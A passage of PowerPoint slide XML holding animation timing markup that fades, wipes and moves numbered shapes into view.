                                        <p:cTn id="121" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="333"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="122" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="333"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="123" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="124" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="492"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="125" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="492"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="126" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="127" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="321"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="128" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="321"/>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532"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="131" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="532"/>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2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="136" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="137" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="with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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="140" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="141" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="36193"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="142" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36193"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="143" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="144" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="36154"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="145" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36154"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="146" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="147" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="36115"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="148" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36115"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="149" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="with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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="152" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="153" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="36271"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="154" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36271"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="155" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="156" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="36232"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="157" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36232"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="158" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="159" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="160" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="161" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="162" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="36310"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="163" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36310"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="164" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="165" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="166" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="167" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="168" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="169" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="170" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="171" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="172" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="24"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="173" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="174" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="175" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="176" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="177" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="178" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="36140"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="179" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36140"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="180" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="181" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="36179"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="182" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36179"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="183" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="184" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="36218"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="185" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36218"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="186" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="187" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="36257"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="188" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36257"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="189" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="190" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="36296"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="191" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36296"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="192" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="193" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="258"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="194" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="258"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="195" presetID="0" presetClass="path" presetSubtype="0" repeatCount="4000" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 5.20833E-7 -4.25926E-6 L -0.14967 0.15637 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="196" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="258"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-7500" y="7800"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="197" presetID="0" presetClass="path" presetSubtype="0" repeatCount="4000" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 4.16667E-7 -1.2963E-6 L 0.07897 -0.13136 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="198" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="3900" y="-6600"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="199" presetID="0" presetClass="path" presetSubtype="0" repeatCount="4000" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.00072 -0.00069 L -0.01042 -0.18414 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="200" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-500" y="-9200"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="201" presetID="0" presetClass="path" presetSubtype="0" repeatCount="4000" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 2.8125E-6 9.25926E-7 L -0.09082 -0.28958 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="202" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-4500" y="-14500"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="203" presetID="0" presetClass="path" presetSubtype="0" repeatCount="4000" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 3.95833E-6 2.40741E-6 L -0.06023 -0.13623 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="204" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-3000" y="-6800"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="205" presetID="0" presetClass="path" presetSubtype="0" repeatCount="4000" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 3.02083E-6 -2.77778E-6 L 0.01699 0.09109 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="206" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36140"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="800" y="4500"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="207" presetID="0" presetClass="path" presetSubtype="0" repeatCount="4000" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 3.85417E-6 7.40741E-7 L 0.12376 0.12697 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="208" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36179"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="6200" y="6300"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="209" presetID="0" presetClass="path" presetSubtype="0" repeatCount="4000" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -3.125E-7 2.96296E-6 L -0.05085 0.10104 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="210" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36218"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-2500" y="5000"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="211" presetID="0" presetClass="path" presetSubtype="0" repeatCount="4000" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
